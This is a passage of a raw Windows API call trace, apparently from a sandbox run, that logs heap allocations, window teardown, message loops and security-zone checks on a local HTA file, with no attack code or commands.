lpSystemTimeAsFileTime=0xc08048 | out: lpSystemTimeAsFileTime=0xc08048*(dwLowDateTime=0x763dd1b1, dwHighDateTime=0x1d7d80b)) [0187.302] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08050 | out: lpSystemTimeAsFileTime=0xc08050*(dwLowDateTime=0x763dd1b1, dwHighDateTime=0x1d7d80b)) [0187.303] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0187.304] IUnknown:Release (This=0x6cdc08) returned 0x0 [0187.304] IUnknown:Release (This=0xd121e4) returned 0x0 [0187.304] IUnknown:Release (This=0xd1e334) returned 0x0 [0187.304] CoTaskMemFree (pv=0x6b5c30) [0187.304] CoTaskMemFree (pv=0x6b5c58) [0187.306] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6904d8 | out: hHeap=0x5e0000) returned 1 [0187.306] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8b48 | out: hHeap=0x5e0000) returned 1 [0187.307] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8a08 | out: hHeap=0x5e0000) returned 1 [0187.307] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8a48 | out: hHeap=0x5e0000) returned 1 [0187.307] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d88e8 | out: hHeap=0x5e0000) returned 1 [0187.307] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8b28 | out: hHeap=0x5e0000) returned 1 [0187.307] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8ae8 | out: hHeap=0x5e0000) returned 1 [0187.307] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8928 | out: hHeap=0x5e0000) returned 1 [0187.308] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d88c8 | out: hHeap=0x5e0000) returned 1 [0187.308] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8b08 | out: hHeap=0x5e0000) returned 1 [0187.308] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5d48 | out: hHeap=0x5e0000) returned 1 [0187.308] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5eb0 | out: hHeap=0x5e0000) returned 1 [0187.308] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5c80 | out: hHeap=0x5e0000) returned 1 [0187.308] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5e88 | out: hHeap=0x5e0000) returned 1 [0187.308] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5e38 | out: hHeap=0x5e0000) returned 1 [0187.308] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5f00 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d83c8 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5f78 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef0ef0 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cf130 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef15d0 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3818 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8368 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cefe0 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3a48 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcb40 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3b38 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8398 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3c50 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3c78 | out: hHeap=0x5e0000) returned 1 [0187.309] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ced40 | out: hHeap=0x5e0000) returned 1 [0187.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8188 | out: hHeap=0x5e0000) returned 1 [0187.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3db8 | out: hHeap=0x5e0000) returned 1 [0187.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7fa8 | out: hHeap=0x5e0000) returned 1 [0187.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3e30 | out: hHeap=0x5e0000) returned 1 [0187.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3ed0 | out: hHeap=0x5e0000) returned 1 [0187.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8098 | out: hHeap=0x5e0000) returned 1 [0187.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3c28 | out: hHeap=0x5e0000) returned 1 [0187.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcac0 | out: hHeap=0x5e0000) returned 1 [0187.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3e08 | out: hHeap=0x5e0000) returned 1 [0187.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3d18 | out: hHeap=0x5e0000) returned 1 [0187.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3e58 | out: hHeap=0x5e0000) returned 1 [0187.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8428 | out: hHeap=0x5e0000) returned 1 [0187.311] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d81b8 | out: hHeap=0x5e0000) returned 1 [0187.311] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3d90 | out: hHeap=0x5e0000) returned 1 [0187.311] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5d20 | out: hHeap=0x5e0000) returned 1 [0187.311] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcb00 | out: hHeap=0x5e0000) returned 1 [0187.311] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcaa0 | out: hHeap=0x5e0000) returned 1 [0187.313] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6929a0 | out: hHeap=0x5e0000) returned 1 [0187.314] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6923b0 | out: hHeap=0x5e0000) returned 1 [0187.314] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b6990 | out: hHeap=0x5e0000) returned 1 [0187.317] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67b3c0 | out: hHeap=0x5e0000) returned 1 [0187.320] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64a730 | out: hHeap=0x5e0000) returned 1 [0187.323] DeleteObject (ho=0x760a09fd) returned 1 [0187.323] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7cb8 | out: hHeap=0x5e0000) returned 1 [0187.323] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67bd00 | out: hHeap=0x5e0000) returned 1 [0187.324] UnregisterPowerSettingNotification (Handle=0x692720) returned 1 [0187.325] SetWindowLongW (hWnd=0x103e4, nIndex=-21, dwNewLong=0) returned 7140024 [0187.325] DestroyWindow (hWnd=0x103e4) returned 1 [0187.325] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 0 [0187.325] NtdllDefWindowProc_W () returned 0x0 [0187.328] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 0 [0187.328] NtdllDefWindowProc_W () returned 0x0 [0187.328] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 0 [0187.328] NtdllDefWindowProc_W () returned 0x0 [0187.329] UnregisterClassW (lpClassName=0xc242, hInstance=0x0) returned 1 [0187.329] UnmapViewOfFile (lpBaseAddress=0x95f0000) returned 1 [0187.329] CloseHandle (hObject=0x66c) returned 1 [0187.330] CloseHandle (hObject=0x668) returned 1 [0187.330] GetProcessHeap () returned 0x5e0000 [0187.330] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cf2b8 | out: hHeap=0x5e0000) returned 1 [0187.331] IUnknown:Release (This=0xcf8960) returned 0x1 [0187.331] IUnknown:Release (This=0x613358) returned 0x1 [0187.332] IUnknown:Release (This=0x9ee0b04) returned 0x2 [0187.332] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0187.333] GetProcAddress (hModule=0x76b10000, lpProcName="OleUninitialize") returned 0x76b36eb0 [0187.333] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19a598 | out: lpflOldProtect=0x19a598*=0x4) returned 1 [0187.334] OleUninitialize () [0187.334] IUnknown:Release (This=0xcf8960) returned 0x0 [0187.335] IUnknown:Release (This=0x6b50cc) returned 0x1 [0187.336] CoTaskMemFree (pv=0x6b5d98) [0187.336] free (_Block=0xc4faf8) [0187.336] free (_Block=0xc4c728) [0187.336] GetCurrentThreadId () returned 0xb48 [0187.337] GetCurrentThreadId () returned 0xb48 [0187.343] longjmp () [0187.343] GetCurrentThreadId () returned 0xb48 [0187.343] GetCurrentThreadId () returned 0xb48 [0187.343] GetCurrentThreadId () returned 0xb48 [0187.343] GetCurrentThreadId () returned 0xb48 [0187.344] IUnknown:Release (This=0xcf8570) returned 0x8 [0187.344] GetCurrentThreadId () returned 0xb48 [0187.344] GetCurrentThreadId () returned 0xb48 [0187.344] free (_Block=0xc48520) [0187.344] ISystemDebugEventFire:IsActive (This=0x68f968) returned 0x1 [0187.345] free (_Block=0xc5aa00) [0187.345] free (_Block=0xc4ac78) [0187.345] GetCurrentThreadId () returned 0xb48 [0187.345] GetCurrentThreadId () returned 0xb48 [0187.345] GetCurrentThreadId () returned 0xb48 [0187.345] GetCurrentThreadId () returned 0xb48 [0187.345] GetCurrentThreadId () returned 0xb48 [0187.345] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690880 | out: hHeap=0x5e0000) returned 1 [0187.346] GetCurrentThreadId () returned 0xb48 [0187.346] SetEvent (hEvent=0x29c) returned 1 [0187.346] GetMessageW (in: lpMsg=0x19fe74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19fe74) returned 1 [0187.346] TranslateMessage (lpMsg=0x19fe74) returned 0 [0187.347] DispatchMessageW (lpMsg=0x19fe74) returned 0x0 [0187.347] GetMessageW (in: lpMsg=0x19fe74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19fe74) returned 1 [0187.347] TranslateMessage (lpMsg=0x19fe74) returned 0 [0187.347] DispatchMessageW (lpMsg=0x19fe74) returned 0x0 [0187.347] GetMessageW (in: lpMsg=0x19fe74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19fe74) returned 1 [0187.352] TranslateMessage (lpMsg=0x19fe74) returned 0 [0187.352] DispatchMessageW (lpMsg=0x19fe74) returned 0x0 [0187.353] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.353] StrChrW (lpStart="language", wMatch=0x3a) returned 0x0 [0187.354] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.354] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x6dc940 [0187.354] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.354] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.354] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.354] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.354] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x800) returned 0x690770 [0187.355] SetTimer (hWnd=0x103ba, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0187.355] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f984 | out: ppu=0x19f984) returned 0x0 [0187.356] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0187.356] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0187.356] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0187.356] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f930, dwFlags=0x0 | out: pdwZone=0x19f930*=0xffffffff) returned 0x800c0011 [0187.356] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0187.356] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0187.356] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0187.356] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1400, pPolicy=0x19f934, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f914 | out: pPolicy=0x19f934*=0x0, pdwOutFlags=0x19f914*=0x0) returned 0x0 [0187.356] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1400, pPolicy=0x19f934, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f934*=0x0) returned 0x0 [0187.356] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0187.356] IUnknown:Release (This=0x5f0b00) returned 0x1 [0187.356] IUnknown:Release (This=0x609dbc) returned 0x7 [0187.357] QueryPerformanceCounter (in: lpPerformanceCount=0xd109e0 | out: lpPerformanceCount=0xd109e0*=3100617685812) returned 1 [0187.358] GetCurrentThreadId () returned 0xb48 [0187.358] GetCurrentThreadId () returned 0xb48 [0187.358] GetCurrentThreadId () returned 0xb48 [0187.359] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.359] LsGetRubyLsimethods () returned 0x0 [0187.359] LsGetTatenakayokoLsimethods () returned 0x0 [0187.359] LsGetHihLsimethods () returned 0x0 [0187.359] LsGetWarichuLsimethods () returned 0x0 [0187.359] LsGetReverseLsimethods () returned 0x0 [0187.359] LsCreateContext () returned 0x0 [0187.359] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x670) returned 0x9ef3f00 [0187.360] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d8338 [0187.360] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x9eeb5a0 [0187.360] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d82a8 [0187.360] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2e4) returned 0x6bc878 [0187.360] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x9eebb28 [0187.360] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x9eebb78 [0187.360] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2920 [0187.360] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db310 [0187.360] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x9eeba60 [0187.360] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x9eebab0 [0187.361] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x9eeb858 [0187.361] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x9eebad8 [0187.361] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x400) returned 0x64a3a0 [0187.361] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.361] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.361] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.361] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.361] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x128) returned 0x9ef84b8 [0187.361] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x11c) returned 0x67c2c8 [0187.361] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x6bdcd8 [0187.362] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x130) returned 0x6d0018 [0187.362] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x6bce28 [0187.362] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x278) returned 0x6c5c60 [0187.362] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x64ae30 [0187.362] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x9eedcc8 [0187.362] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x78) returned 0x6ce208 [0187.362] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xf0) returned 0x62e4d0 [0187.362] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4c) returned 0x68d180 [0187.362] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x194) returned 0x649cf0 [0187.362] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x64b0a0 [0187.362] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x649e90 [0187.362] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x60db08 [0187.363] LsSetModWidthPairs () returned 0x0 [0187.363] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x240) returned 0x9ef9e00 [0187.363] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dcb00 [0187.363] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.363] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.363] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.363] LsSetBreaking () returned 0x0 [0187.363] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x271) returned 0x68a700 [0187.364] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x9f83010 [0187.364] LsSetDoc () returned 0x0 [0187.364] IOleInPlaceFrame:RemoveMenus (This=0xcfbc60, hmenuShared=0x9ef40ac) returned 0x0 [0187.364] IOleInPlaceFrame:RemoveMenus (This=0xcfbc70, hmenuShared=0x9ef40ac) returned 0x0 [0187.364] IOleInPlaceFrame:RemoveMenus (This=0xcfbc80, hmenuShared=0x9ef40ac) returned 0x0 [0187.364] IOleInPlaceFrame:RemoveMenus (This=0xcfbc90, hmenuShared=0x9ef40ac) returned 0x0 [0187.364] LsCreateLine () [0187.364] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.368] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.369] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x114) returned 0x67bbd8 [0187.377] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x64ae30, Size=0x12c) returned 0x64a028 [0187.377] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x64b0a0, Size=0x12c) returned 0x68a980 [0187.377] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x9eedcc8, Size=0x258) returned 0x68aab8 [0187.377] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x649e90, Size=0x258) returned 0x686078 [0187.399] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x64a028, Size=0x190) returned 0x64a028 [0187.399] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x68a980, Size=0x190) returned 0x649e90 [0187.399] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x68aab8, Size=0x320) returned 0x68aab8 [0187.399] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x320) returned 0x686078 [0187.415] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x64a028, Size=0x1f4) returned 0x9eedcc8 [0187.416] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x649e90, Size=0x1f4) returned 0x649e90 [0187.416] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x68aab8, Size=0x3e8) returned 0x68aab8 [0187.416] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x3e8) returned 0x686078 [0187.416] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.424] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x9eedcc8, Size=0x258) returned 0x686468 [0187.424] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x649e90, Size=0x258) returned 0x649e90 [0187.424] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x68aab8, Size=0x4b0) returned 0x6866c8 [0187.424] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x4b0) returned 0x68a980 [0187.424] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686468, Size=0x2bc) returned 0x686078 [0187.424] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x649e90, Size=0x2bc) returned 0x649e90 [0187.425] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6866c8, Size=0x578) returned 0x6866c8 [0187.425] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x68a980, Size=0x578) returned 0x647bc0 [0187.425] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x320) returned 0x686078 [0187.425] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x649e90, Size=0x320) returned 0x649e90 [0187.425] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6866c8, Size=0x640) returned 0x6866c8 [0187.425] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x647bc0, Size=0x640) returned 0x647bc0 [0187.436] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x384) returned 0x686078 [0187.436] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x649e90, Size=0x384) returned 0x68a980 [0187.436] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6866c8, Size=0x708) returned 0x6866c8 [0187.436] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x647bc0, Size=0x708) returned 0x647bc0 [0187.437] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x3e8) returned 0x686078 [0187.437] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x68a980, Size=0x3e8) returned 0x68a980 [0187.437] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6866c8, Size=0x7d0) returned 0x6866c8 [0187.437] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x647bc0, Size=0x7d0) returned 0x647bc0 [0187.438] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x44c) returned 0x686078 [0187.438] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x68a980, Size=0x44c) returned 0x68a980 [0187.438] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6866c8, Size=0x898) returned 0x6866c8 [0187.438] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x647bc0, Size=0x898) returned 0x647bc0 [0187.438] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x4b0) returned 0x686078 [0187.438] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x68a980, Size=0x4b0) returned 0x68a980 [0187.438] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6866c8, Size=0x960) returned 0x648460 [0187.439] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x647bc0, Size=0x960) returned 0x686530 [0187.439] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0x514) returned 0x647bc0 [0187.439] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x68a980, Size=0x514) returned 0x68a980 [0187.439] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x648460, Size=0xa28) returned 0x648460 [0187.439] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686530, Size=0xa28) returned 0x686530 [0187.456] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x647bc0, Size=0x578) returned 0x647bc0 [0187.456] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x68a980, Size=0x578) returned 0x6887f8 [0187.456] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x648460, Size=0xaf0) returned 0x648460 [0187.456] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686530, Size=0xaf0) returned 0x688d78 [0187.456] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x647bc0, Size=0x5dc) returned 0x647bc0 [0187.456] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6887f8, Size=0x5dc) returned 0x689870 [0187.456] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x648460, Size=0xbb8) returned 0x686078 [0187.457] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x688d78, Size=0xbb8) returned 0x6481a8 [0187.457] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x647bc0, Size=0x640) returned 0x6887f8 [0187.457] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x689870, Size=0x640) returned 0x689870 [0187.457] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0xc80) returned 0x686078 [0187.457] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6481a8, Size=0xc80) returned 0x6481a8 [0187.457] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6887f8, Size=0x6a4) returned 0x6887f8 [0187.457] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x689870, Size=0x6a4) returned 0x689870 [0187.457] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0xd48) returned 0x686078 [0187.458] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6481a8, Size=0xd48) returned 0x6481a8 [0187.458] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6887f8, Size=0x708) returned 0x6887f8 [0187.458] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x689870, Size=0x708) returned 0x689870 [0187.459] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0xe10) returned 0x686078 [0187.459] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6481a8, Size=0xe10) returned 0x6481a8 [0187.459] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6887f8, Size=0x76c) returned 0x6887f8 [0187.459] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x689870, Size=0x76c) returned 